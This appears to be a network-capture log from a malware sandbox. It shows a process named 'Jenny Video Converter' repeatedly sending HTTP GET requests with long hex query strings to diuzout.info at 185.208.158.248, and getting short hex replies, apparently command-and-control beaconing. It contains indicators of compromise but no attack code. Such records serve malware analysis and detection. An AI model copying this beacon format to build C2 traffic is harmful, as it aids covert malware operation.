                                                                              6192.168.2.663169185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:00.707314968 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:01.398214102 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:01 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.663170185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:01.519860029 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:02.218530893 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:02 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20
                                                                              Oct 8, 2024 04:14:02.327187061 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:02.562807083 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:02 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20
                                                                              Oct 8, 2024 04:14:02.670967102 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:02.906702995 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:02 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20
                                                                              Oct 8, 2024 04:14:03.014552116 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:03.256772041 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:03 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.663171185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:03.379290104 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:04.056408882 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:03 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.663172185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:04.175849915 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:04.879509926 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:04 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              10192.168.2.663174185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:05.004883051 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:05.705967903 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:05 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              11192.168.2.663175185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:05.832245111 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:06.545501947 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:06 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              12192.168.2.663176185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:06.676677942 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:07.381748915 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:07 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              13192.168.2.663177185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:07.504508972 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:08.201971054 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:08 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              14192.168.2.663178185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:08.332726955 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:09.014743090 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:08 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20
                                                                              Oct 8, 2024 04:14:09.124156952 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:09.364315987 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:09 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              15192.168.2.663179185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:09.488717079 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:10.181592941 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:10 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              16192.168.2.663180185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:10.301134109 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:10.981443882 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:10 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20
                                                                              Oct 8, 2024 04:14:11.092614889 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:11.334624052 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:11 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              17192.168.2.663181185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:11.457354069 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:12.144870996 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:12 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              18192.168.2.663182185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:12.427371025 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:13.116638899 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:13 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              19192.168.2.663183185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:13.240716934 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:13.930902004 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:13 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              20192.168.2.663184185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:14.053086996 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:14.736906052 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:14 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              21192.168.2.663185185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:14.865211964 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:15.553134918 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:15 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              22192.168.2.663186185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:15.678229094 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:16.375803947 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:16 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              23192.168.2.663187185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:16.490117073 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:17.180108070 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:17 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              24192.168.2.663188185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:17.303303957 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:18.026937962 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:17 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              25192.168.2.663189185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:18.153985023 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:18.857757092 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:18 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
